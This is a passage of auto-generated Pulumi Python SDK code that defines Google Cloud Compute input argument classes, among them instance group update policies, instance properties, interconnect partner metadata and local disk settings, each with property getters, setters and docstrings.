return pulumi.get(self, "max_unavailable")
@max_unavailable.setter
def max_unavailable(self, value: Optional[pulumi.Input['FixedOrPercentArgs']]):
pulumi.set(self, "max_unavailable", value)
@property
@pulumi.getter(name="minReadySec")
def min_ready_sec(self) -> Optional[pulumi.Input[int]]:
"""
Minimum number of seconds to wait for after a newly created instance becomes available. This value must be from range [0, 3600].
"""
return pulumi.get(self, "min_ready_sec")
@min_ready_sec.setter
def min_ready_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_ready_sec", value)
@property
@pulumi.getter(name="minimalAction")
def minimal_action(self) -> Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMinimalAction']]:
"""
Minimal action to be taken on an instance. You can specify either RESTART to restart existing instances or REPLACE to delete and create new instances from the target template. If you specify a RESTART, the Updater will attempt to perform that action only. However, if the Updater determines that the minimal action you specify is not enough to perform the update, it might perform a more disruptive action.
"""
return pulumi.get(self, "minimal_action")
@minimal_action.setter
def minimal_action(self, value: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMinimalAction']]):
pulumi.set(self, "minimal_action", value)
@property
@pulumi.getter(name="mostDisruptiveAllowedAction")
def most_disruptive_allowed_action(self) -> Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedAction']]:
"""
Most disruptive action that is allowed to be taken on an instance. You can specify either NONE to forbid any actions, REFRESH to allow actions that do not need instance restart, RESTART to allow actions that can be applied without instance replacing or REPLACE to allow all possible actions. If the Updater determines that the minimal update action needed is more disruptive than most disruptive allowed action you specify it will not perform the update at all.
"""
return pulumi.get(self, "most_disruptive_allowed_action")
@most_disruptive_allowed_action.setter
def most_disruptive_allowed_action(self, value: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedAction']]):
pulumi.set(self, "most_disruptive_allowed_action", value)
@property
@pulumi.getter(name="replacementMethod")
def replacement_method(self) -> Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyReplacementMethod']]:
"""
What action should be used to replace instances. See minimal_action.REPLACE
"""
return pulumi.get(self, "replacement_method")
@replacement_method.setter
def replacement_method(self, value: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyReplacementMethod']]):
pulumi.set(self, "replacement_method", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyType']]:
"""
The type of update process. You can specify either PROACTIVE so that the instance group manager proactively executes actions in order to bring instances to their target versions or OPPORTUNISTIC so that no action is proactively executed but the update will be performed as part of other actions (for example, resizes or recreateInstances calls).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['InstanceGroupManagerUpdatePolicyType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class InstanceGroupManagerVersionArgs:
def __init__(__self__, *,
instance_template: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
target_size: Optional[pulumi.Input['FixedOrPercentArgs']] = None):
"""
:param pulumi.Input[str] instance_template: The URL of the instance template that is specified for this managed instance group. The group uses this template to create new instances in the managed instance group until the `targetSize` for this version is reached. The templates for existing instances in the group do not change unless you run recreateInstances, run applyUpdatesToInstances, or set the group's updatePolicy.type to PROACTIVE; in those cases, existing instances are updated until the `targetSize` for this version is reached.
:param pulumi.Input[str] name: Name of the version. Unique among all versions in the scope of this managed instance group.
:param pulumi.Input['FixedOrPercentArgs'] target_size: Specifies the intended number of instances to be created from the instanceTemplate. The final number of instances created from the template will be equal to: - If expressed as a fixed number, the minimum of either targetSize.fixed or instanceGroupManager.targetSize is used. - if expressed as a percent, the targetSize would be (targetSize.percent/100 * InstanceGroupManager.targetSize) If there is a remainder, the number is rounded. If unset, this version will update any remaining instances not updated by another version. Read Starting a canary update for more information.
"""
if instance_template is not None:
pulumi.set(__self__, "instance_template", instance_template)
if name is not None:
pulumi.set(__self__, "name", name)
if target_size is not None:
pulumi.set(__self__, "target_size", target_size)
@property
@pulumi.getter(name="instanceTemplate")
def instance_template(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the instance template that is specified for this managed instance group. The group uses this template to create new instances in the managed instance group until the `targetSize` for this version is reached. The templates for existing instances in the group do not change unless you run recreateInstances, run applyUpdatesToInstances, or set the group's updatePolicy.type to PROACTIVE; in those cases, existing instances are updated until the `targetSize` for this version is reached.
"""
return pulumi.get(self, "instance_template")
@instance_template.setter
def instance_template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_template", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the version. Unique among all versions in the scope of this managed instance group.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="targetSize")
def target_size(self) -> Optional[pulumi.Input['FixedOrPercentArgs']]:
"""
Specifies the intended number of instances to be created from the instanceTemplate. The final number of instances created from the template will be equal to: - If expressed as a fixed number, the minimum of either targetSize.fixed or instanceGroupManager.targetSize is used. - if expressed as a percent, the targetSize would be (targetSize.percent/100 * InstanceGroupManager.targetSize) If there is a remainder, the number is rounded. If unset, this version will update any remaining instances not updated by another version. Read Starting a canary update for more information.
"""
return pulumi.get(self, "target_size")
@target_size.setter
def target_size(self, value: Optional[pulumi.Input['FixedOrPercentArgs']]):
pulumi.set(self, "target_size", value)
@pulumi.input_type
class InstanceParamsArgs:
def __init__(__self__, *,
resource_manager_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Additional instance params.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_manager_tags: Resource manager tags to be bound to the instance. Tag keys and values have the same definition as resource manager tags. Keys must be in the format `tagKeys/{tag_key_id}`, and values are in the format `tagValues/456`. The field is ignored (both PUT & PATCH) when empty.
"""
if resource_manager_tags is not None:
pulumi.set(__self__, "resource_manager_tags", resource_manager_tags)
@property
@pulumi.getter(name="resourceManagerTags")
def resource_manager_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource manager tags to be bound to the instance. Tag keys and values have the same definition as resource manager tags. Keys must be in the format `tagKeys/{tag_key_id}`, and values are in the format `tagValues/456`. The field is ignored (both PUT & PATCH) when empty.
"""
return pulumi.get(self, "resource_manager_tags")
@resource_manager_tags.setter
def resource_manager_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "resource_manager_tags", value)
@pulumi.input_type
class InstancePropertiesArgs:
def __init__(__self__, *,
advanced_machine_features: Optional[pulumi.Input['AdvancedMachineFeaturesArgs']] = None,
can_ip_forward: Optional[pulumi.Input[bool]] = None,
confidential_instance_config: Optional[pulumi.Input['ConfidentialInstanceConfigArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
disks: Optional[pulumi.Input[Sequence[pulumi.Input['AttachedDiskArgs']]]] = None,
display_device: Optional[pulumi.Input['DisplayDeviceArgs']] = None,
guest_accelerators: Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
machine_type: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input['MetadataArgs']] = None,
min_cpu_platform: Optional[pulumi.Input[str]] = None,
network_interfaces: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceArgs']]]] = None,
network_performance_config: Optional[pulumi.Input['NetworkPerformanceConfigArgs']] = None,
post_key_revocation_action_type: Optional[pulumi.Input['InstancePropertiesPostKeyRevocationActionType']] = None,
private_ipv6_google_access: Optional[pulumi.Input['InstancePropertiesPrivateIpv6GoogleAccess']] = None,
reservation_affinity: Optional[pulumi.Input['ReservationAffinityArgs']] = None,
resource_manager_tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_policies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
scheduling: Optional[pulumi.Input['SchedulingArgs']] = None,
service_accounts: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceAccountArgs']]]] = None,
shielded_instance_config: Optional[pulumi.Input['ShieldedInstanceConfigArgs']] = None,
shielded_vm_config: Optional[pulumi.Input['ShieldedVmConfigArgs']] = None,
tags: Optional[pulumi.Input['TagsArgs']] = None):
"""
:param pulumi.Input['AdvancedMachineFeaturesArgs'] advanced_machine_features: Controls for advanced machine-related behavior features. Note that for MachineImage, this is not supported yet.
:param pulumi.Input[bool] can_ip_forward: Enables instances created based on these properties to send packets with source IP addresses other than their own and receive packets with destination IP addresses other than their own. If these instances will be used as an IP gateway or it will be set as the next-hop in a Route resource, specify true. If unsure, leave this set to false. See the Enable IP forwarding documentation for more information.
:param pulumi.Input['ConfidentialInstanceConfigArgs'] confidential_instance_config: Specifies the Confidential Instance options. Note that for MachineImage, this is not supported yet.
:param pulumi.Input[str] description: An optional text description for the instances that are created from these properties.
:param pulumi.Input[Sequence[pulumi.Input['AttachedDiskArgs']]] disks: An array of disks that are associated with the instances that are created from these properties.
:param pulumi.Input['DisplayDeviceArgs'] display_device: Display Device properties to enable support for remote display products like: Teradici, VNC and TeamViewer Note that for MachineImage, this is not supported yet.
:param pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]] guest_accelerators: A list of guest accelerator cards' type and count to use for instances created from these properties.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to instances that are created from these properties.
:param pulumi.Input[str] machine_type: The machine type to use for instances that are created from these properties.
:param pulumi.Input['MetadataArgs'] metadata: The metadata key/value pairs to assign to instances that are created from these properties. These pairs can consist of custom metadata or predefined keys. See Project and instance metadata for more information.
:param pulumi.Input[str] min_cpu_platform: Minimum cpu/platform to be used by instances. The instance may be scheduled on the specified or newer cpu/platform. Applicable values are the friendly names of CPU platforms, such as minCpuPlatform: "Intel Haswell" or minCpuPlatform: "Intel Sandy Bridge". For more information, read Specifying a Minimum CPU Platform.
:param pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceArgs']]] network_interfaces: An array of network access configurations for this interface.
:param pulumi.Input['NetworkPerformanceConfigArgs'] network_performance_config: Note that for MachineImage, this is not supported yet.
:param pulumi.Input['InstancePropertiesPostKeyRevocationActionType'] post_key_revocation_action_type: PostKeyRevocationActionType of the instance.
:param pulumi.Input['InstancePropertiesPrivateIpv6GoogleAccess'] private_ipv6_google_access: The private IPv6 google access type for VMs. If not specified, use INHERIT_FROM_SUBNETWORK as default. Note that for MachineImage, this is not supported yet.
:param pulumi.Input['ReservationAffinityArgs'] reservation_affinity: Specifies the reservations that instances can consume from. Note that for MachineImage, this is not supported yet.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_manager_tags: Resource manager tags to be bound to the instance. Tag keys and values have the same definition as resource manager tags. Keys must be in the format `tagKeys/{tag_key_id}`, and values are in the format `tagValues/456`. The field is ignored (both PUT & PATCH) when empty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_policies: Resource policies (names, not URLs) applied to instances created from these properties. Note that for MachineImage, this is not supported yet.
:param pulumi.Input['SchedulingArgs'] scheduling: Specifies the scheduling options for the instances that are created from these properties.
:param pulumi.Input[Sequence[pulumi.Input['ServiceAccountArgs']]] service_accounts: A list of service accounts with specified scopes. Access tokens for these service accounts are available to the instances that are created from these properties. Use metadata queries to obtain the access tokens for these instances.
:param pulumi.Input['ShieldedInstanceConfigArgs'] shielded_instance_config: Note that for MachineImage, this is not supported yet.
:param pulumi.Input['ShieldedVmConfigArgs'] shielded_vm_config: Specifies the Shielded VM options for the instances that are created from these properties.
:param pulumi.Input['TagsArgs'] tags: A list of tags to apply to the instances that are created from these properties. The tags identify valid sources or targets for network firewalls. The setTags method can modify this list of tags. Each tag within the list must comply with RFC1035.
"""
if advanced_machine_features is not None:
pulumi.set(__self__, "advanced_machine_features", advanced_machine_features)
if can_ip_forward is not None:
pulumi.set(__self__, "can_ip_forward", can_ip_forward)
if confidential_instance_config is not None:
pulumi.set(__self__, "confidential_instance_config", confidential_instance_config)
if description is not None:
pulumi.set(__self__, "description", description)
if disks is not None:
pulumi.set(__self__, "disks", disks)
if display_device is not None:
pulumi.set(__self__, "display_device", display_device)
if guest_accelerators is not None:
pulumi.set(__self__, "guest_accelerators", guest_accelerators)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if machine_type is not None:
pulumi.set(__self__, "machine_type", machine_type)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if min_cpu_platform is not None:
pulumi.set(__self__, "min_cpu_platform", min_cpu_platform)
if network_interfaces is not None:
pulumi.set(__self__, "network_interfaces", network_interfaces)
if network_performance_config is not None:
pulumi.set(__self__, "network_performance_config", network_performance_config)
if post_key_revocation_action_type is not None:
pulumi.set(__self__, "post_key_revocation_action_type", post_key_revocation_action_type)
if private_ipv6_google_access is not None:
pulumi.set(__self__, "private_ipv6_google_access", private_ipv6_google_access)
if reservation_affinity is not None:
pulumi.set(__self__, "reservation_affinity", reservation_affinity)
if resource_manager_tags is not None:
pulumi.set(__self__, "resource_manager_tags", resource_manager_tags)
if resource_policies is not None:
pulumi.set(__self__, "resource_policies", resource_policies)
if scheduling is not None:
pulumi.set(__self__, "scheduling", scheduling)
if service_accounts is not None:
pulumi.set(__self__, "service_accounts", service_accounts)
if shielded_instance_config is not None:
pulumi.set(__self__, "shielded_instance_config", shielded_instance_config)
if shielded_vm_config is not None:
pulumi.set(__self__, "shielded_vm_config", shielded_vm_config)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="advancedMachineFeatures")
def advanced_machine_features(self) -> Optional[pulumi.Input['AdvancedMachineFeaturesArgs']]:
"""
Controls for advanced machine-related behavior features. Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "advanced_machine_features")
@advanced_machine_features.setter
def advanced_machine_features(self, value: Optional[pulumi.Input['AdvancedMachineFeaturesArgs']]):
pulumi.set(self, "advanced_machine_features", value)
@property
@pulumi.getter(name="canIpForward")
def can_ip_forward(self) -> Optional[pulumi.Input[bool]]:
"""
Enables instances created based on these properties to send packets with source IP addresses other than their own and receive packets with destination IP addresses other than their own. If these instances will be used as an IP gateway or it will be set as the next-hop in a Route resource, specify true. If unsure, leave this set to false. See the Enable IP forwarding documentation for more information.
"""
return pulumi.get(self, "can_ip_forward")
@can_ip_forward.setter
def can_ip_forward(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "can_ip_forward", value)
@property
@pulumi.getter(name="confidentialInstanceConfig")
def confidential_instance_config(self) -> Optional[pulumi.Input['ConfidentialInstanceConfigArgs']]:
"""
Specifies the Confidential Instance options. Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "confidential_instance_config")
@confidential_instance_config.setter
def confidential_instance_config(self, value: Optional[pulumi.Input['ConfidentialInstanceConfigArgs']]):
pulumi.set(self, "confidential_instance_config", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional text description for the instances that are created from these properties.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def disks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AttachedDiskArgs']]]]:
"""
An array of disks that are associated with the instances that are created from these properties.
"""
return pulumi.get(self, "disks")
@disks.setter
def disks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AttachedDiskArgs']]]]):
pulumi.set(self, "disks", value)
@property
@pulumi.getter(name="displayDevice")
def display_device(self) -> Optional[pulumi.Input['DisplayDeviceArgs']]:
"""
Display Device properties to enable support for remote display products like: Teradici, VNC and TeamViewer Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "display_device")
@display_device.setter
def display_device(self, value: Optional[pulumi.Input['DisplayDeviceArgs']]):
pulumi.set(self, "display_device", value)
@property
@pulumi.getter(name="guestAccelerators")
def guest_accelerators(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]]:
"""
A list of guest accelerator cards' type and count to use for instances created from these properties.
"""
return pulumi.get(self, "guest_accelerators")
@guest_accelerators.setter
def guest_accelerators(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AcceleratorConfigArgs']]]]):
pulumi.set(self, "guest_accelerators", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to instances that are created from these properties.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="machineType")
def machine_type(self) -> Optional[pulumi.Input[str]]:
"""
The machine type to use for instances that are created from these properties.
"""
return pulumi.get(self, "machine_type")
@machine_type.setter
def machine_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "machine_type", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input['MetadataArgs']]:
"""
The metadata key/value pairs to assign to instances that are created from these properties. These pairs can consist of custom metadata or predefined keys. See Project and instance metadata for more information.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input['MetadataArgs']]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter(name="minCpuPlatform")
def min_cpu_platform(self) -> Optional[pulumi.Input[str]]:
"""
Minimum cpu/platform to be used by instances. The instance may be scheduled on the specified or newer cpu/platform. Applicable values are the friendly names of CPU platforms, such as minCpuPlatform: "Intel Haswell" or minCpuPlatform: "Intel Sandy Bridge". For more information, read Specifying a Minimum CPU Platform.
"""
return pulumi.get(self, "min_cpu_platform")
@min_cpu_platform.setter
def min_cpu_platform(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_cpu_platform", value)
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceArgs']]]]:
"""
An array of network access configurations for this interface.
"""
return pulumi.get(self, "network_interfaces")
@network_interfaces.setter
def network_interfaces(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkInterfaceArgs']]]]):
pulumi.set(self, "network_interfaces", value)
@property
@pulumi.getter(name="networkPerformanceConfig")
def network_performance_config(self) -> Optional[pulumi.Input['NetworkPerformanceConfigArgs']]:
"""
Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "network_performance_config")
@network_performance_config.setter
def network_performance_config(self, value: Optional[pulumi.Input['NetworkPerformanceConfigArgs']]):
pulumi.set(self, "network_performance_config", value)
@property
@pulumi.getter(name="postKeyRevocationActionType")
def post_key_revocation_action_type(self) -> Optional[pulumi.Input['InstancePropertiesPostKeyRevocationActionType']]:
"""
PostKeyRevocationActionType of the instance.
"""
return pulumi.get(self, "post_key_revocation_action_type")
@post_key_revocation_action_type.setter
def post_key_revocation_action_type(self, value: Optional[pulumi.Input['InstancePropertiesPostKeyRevocationActionType']]):
pulumi.set(self, "post_key_revocation_action_type", value)
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> Optional[pulumi.Input['InstancePropertiesPrivateIpv6GoogleAccess']]:
"""
The private IPv6 google access type for VMs. If not specified, use INHERIT_FROM_SUBNETWORK as default. Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "private_ipv6_google_access")
@private_ipv6_google_access.setter
def private_ipv6_google_access(self, value: Optional[pulumi.Input['InstancePropertiesPrivateIpv6GoogleAccess']]):
pulumi.set(self, "private_ipv6_google_access", value)
@property
@pulumi.getter(name="reservationAffinity")
def reservation_affinity(self) -> Optional[pulumi.Input['ReservationAffinityArgs']]:
"""
Specifies the reservations that instances can consume from. Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "reservation_affinity")
@reservation_affinity.setter
def reservation_affinity(self, value: Optional[pulumi.Input['ReservationAffinityArgs']]):
pulumi.set(self, "reservation_affinity", value)
@property
@pulumi.getter(name="resourceManagerTags")
def resource_manager_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource manager tags to be bound to the instance. Tag keys and values have the same definition as resource manager tags. Keys must be in the format `tagKeys/{tag_key_id}`, and values are in the format `tagValues/456`. The field is ignored (both PUT & PATCH) when empty.
"""
return pulumi.get(self, "resource_manager_tags")
@resource_manager_tags.setter
def resource_manager_tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "resource_manager_tags", value)
@property
@pulumi.getter(name="resourcePolicies")
def resource_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource policies (names, not URLs) applied to instances created from these properties. Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "resource_policies")
@resource_policies.setter
def resource_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_policies", value)
@property
@pulumi.getter
def scheduling(self) -> Optional[pulumi.Input['SchedulingArgs']]:
"""
Specifies the scheduling options for the instances that are created from these properties.
"""
return pulumi.get(self, "scheduling")
@scheduling.setter
def scheduling(self, value: Optional[pulumi.Input['SchedulingArgs']]):
pulumi.set(self, "scheduling", value)
@property
@pulumi.getter(name="serviceAccounts")
def service_accounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceAccountArgs']]]]:
"""
A list of service accounts with specified scopes. Access tokens for these service accounts are available to the instances that are created from these properties. Use metadata queries to obtain the access tokens for these instances.
"""
return pulumi.get(self, "service_accounts")
@service_accounts.setter
def service_accounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceAccountArgs']]]]):
pulumi.set(self, "service_accounts", value)
@property
@pulumi.getter(name="shieldedInstanceConfig")
def shielded_instance_config(self) -> Optional[pulumi.Input['ShieldedInstanceConfigArgs']]:
"""
Note that for MachineImage, this is not supported yet.
"""
return pulumi.get(self, "shielded_instance_config")
@shielded_instance_config.setter
def shielded_instance_config(self, value: Optional[pulumi.Input['ShieldedInstanceConfigArgs']]):
pulumi.set(self, "shielded_instance_config", value)
@property
@pulumi.getter(name="shieldedVmConfig")
def shielded_vm_config(self) -> Optional[pulumi.Input['ShieldedVmConfigArgs']]:
"""
Specifies the Shielded VM options for the instances that are created from these properties.
"""
return pulumi.get(self, "shielded_vm_config")
@shielded_vm_config.setter
def shielded_vm_config(self, value: Optional[pulumi.Input['ShieldedVmConfigArgs']]):
pulumi.set(self, "shielded_vm_config", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input['TagsArgs']]:
"""
A list of tags to apply to the instances that are created from these properties. The tags identify valid sources or targets for network firewalls. The setTags method can modify this list of tags. Each tag within the list must comply with RFC1035.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input['TagsArgs']]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class Int64RangeMatchArgs:
def __init__(__self__, *,
range_end: Optional[pulumi.Input[str]] = None,
range_start: Optional[pulumi.Input[str]] = None):
"""
HttpRouteRuleMatch criteria for field values that must stay within the specified integer range.
:param pulumi.Input[str] range_end: The end of the range (exclusive) in signed long integer format.
:param pulumi.Input[str] range_start: The start of the range (inclusive) in signed long integer format.
"""
if range_end is not None:
pulumi.set(__self__, "range_end", range_end)
if range_start is not None:
pulumi.set(__self__, "range_start", range_start)
@property
@pulumi.getter(name="rangeEnd")
def range_end(self) -> Optional[pulumi.Input[str]]:
"""
The end of the range (exclusive) in signed long integer format.
"""
return pulumi.get(self, "range_end")
@range_end.setter
def range_end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "range_end", value)
@property
@pulumi.getter(name="rangeStart")
def range_start(self) -> Optional[pulumi.Input[str]]:
"""
The start of the range (inclusive) in signed long integer format.
"""
return pulumi.get(self, "range_start")
@range_start.setter
def range_start(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "range_start", value)
@pulumi.input_type
class InterconnectAttachmentPartnerMetadataArgs:
def __init__(__self__, *,
interconnect_name: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
portal_url: Optional[pulumi.Input[str]] = None):
"""
Informational metadata about Partner attachments from Partners to display to customers. These fields are propagated from PARTNER_PROVIDER attachments to their corresponding PARTNER attachments.
:param pulumi.Input[str] interconnect_name: Plain text name of the Interconnect this attachment is connected to, as displayed in the Partner's portal. For instance "Chicago 1". This value may be validated to match approved Partner values.
:param pulumi.Input[str] partner_name: Plain text name of the Partner providing this attachment. This value may be validated to match approved Partner values.
:param pulumi.Input[str] portal_url: URL of the Partner's portal for this Attachment. Partners may customise this to be a deep link to the specific resource on the Partner portal. This value may be validated to match approved Partner values.
"""
if interconnect_name is not None:
pulumi.set(__self__, "interconnect_name", interconnect_name)
if partner_name is not None:
pulumi.set(__self__, "partner_name", partner_name)
if portal_url is not None:
pulumi.set(__self__, "portal_url", portal_url)
@property
@pulumi.getter(name="interconnectName")
def interconnect_name(self) -> Optional[pulumi.Input[str]]:
"""
Plain text name of the Interconnect this attachment is connected to, as displayed in the Partner's portal. For instance "Chicago 1". This value may be validated to match approved Partner values.
"""
return pulumi.get(self, "interconnect_name")
@interconnect_name.setter
def interconnect_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "interconnect_name", value)
@property
@pulumi.getter(name="partnerName")
def partner_name(self) -> Optional[pulumi.Input[str]]:
"""
Plain text name of the Partner providing this attachment. This value may be validated to match approved Partner values.
"""
return pulumi.get(self, "partner_name")
@partner_name.setter
def partner_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partner_name", value)
@property
@pulumi.getter(name="portalUrl")
def portal_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the Partner's portal for this Attachment. Partners may customise this to be a deep link to the specific resource on the Partner portal. This value may be validated to match approved Partner values.
"""
return pulumi.get(self, "portal_url")
@portal_url.setter
def portal_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "portal_url", value)
@pulumi.input_type
class LicenseResourceCommitmentArgs:
def __init__(__self__, *,
amount: Optional[pulumi.Input[str]] = None,
cores_per_license: Optional[pulumi.Input[str]] = None,
license: Optional[pulumi.Input[str]] = None):
"""
Commitment for a particular license resource.
:param pulumi.Input[str] amount: The number of licenses purchased.
:param pulumi.Input[str] cores_per_license: Specifies the core range of the instance for which this license applies.
:param pulumi.Input[str] license: Any applicable license URI.
"""
if amount is not None:
pulumi.set(__self__, "amount", amount)
if cores_per_license is not None:
pulumi.set(__self__, "cores_per_license", cores_per_license)
if license is not None:
pulumi.set(__self__, "license", license)
@property
@pulumi.getter
def amount(self) -> Optional[pulumi.Input[str]]:
"""
The number of licenses purchased.
"""
return pulumi.get(self, "amount")
@amount.setter
def amount(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "amount", value)
@property
@pulumi.getter(name="coresPerLicense")
def cores_per_license(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the core range of the instance for which this license applies.
"""
return pulumi.get(self, "cores_per_license")
@cores_per_license.setter
def cores_per_license(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cores_per_license", value)
@property
@pulumi.getter
def license(self) -> Optional[pulumi.Input[str]]:
"""
Any applicable license URI.
"""
return pulumi.get(self, "license")
@license.setter
def license(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license", value)
@pulumi.input_type
class LicenseResourceRequirementsArgs:
def __init__(__self__, *,
min_guest_cpu_count: Optional[pulumi.Input[int]] = None,
min_memory_mb: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] min_guest_cpu_count: Minimum number of guest cpus required to use the Instance. Enforced at Instance creation and Instance start.
:param pulumi.Input[int] min_memory_mb: Minimum memory required to use the Instance. Enforced at Instance creation and Instance start.
"""
if min_guest_cpu_count is not None:
pulumi.set(__self__, "min_guest_cpu_count", min_guest_cpu_count)
if min_memory_mb is not None:
pulumi.set(__self__, "min_memory_mb", min_memory_mb)
@property
@pulumi.getter(name="minGuestCpuCount")
def min_guest_cpu_count(self) -> Optional[pulumi.Input[int]]:
"""
Minimum number of guest cpus required to use the Instance. Enforced at Instance creation and Instance start.
"""
return pulumi.get(self, "min_guest_cpu_count")
@min_guest_cpu_count.setter
def min_guest_cpu_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_guest_cpu_count", value)
@property
@pulumi.getter(name="minMemoryMb")
def min_memory_mb(self) -> Optional[pulumi.Input[int]]:
"""
Minimum memory required to use the Instance. Enforced at Instance creation and Instance start.
"""
return pulumi.get(self, "min_memory_mb")
@min_memory_mb.setter
def min_memory_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_memory_mb", value)
@pulumi.input_type
class LocalDiskArgs:
def __init__(__self__, *,
disk_count: Optional[pulumi.Input[int]] = None,
disk_size_gb: Optional[pulumi.Input[int]] = None,
disk_type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] disk_count: Specifies the number of such disks.
:param pulumi.Input[int] disk_size_gb: Specifies the size of the disk in base-2 GB.
:param pulumi.Input[str] disk_type: Specifies the desired disk type on the node. This disk type must be a local storage type (e.g.: local-ssd). Note that for nodeTemplates, this should be the name of the disk type and not its URL.
"""
if disk_count is not None:
pulumi.set(__self__, "disk_count", disk_count)
if disk_size_gb is not None:
pulumi.set(__self__, "disk_size_gb", disk_size_gb)
if disk_type is not None:
pulumi.set(__self__, "disk_type", disk_type)
@property
@pulumi.getter(name="diskCount")
def disk_count(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of such disks.
"""
return pulumi.get(self, "disk_count")
@disk_count.setter
def disk_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_count", value)
@property
@pulumi.getter(name="diskSizeGb")
def disk_size_gb(self) -> Optional[pulumi.Input[int]]:
"""
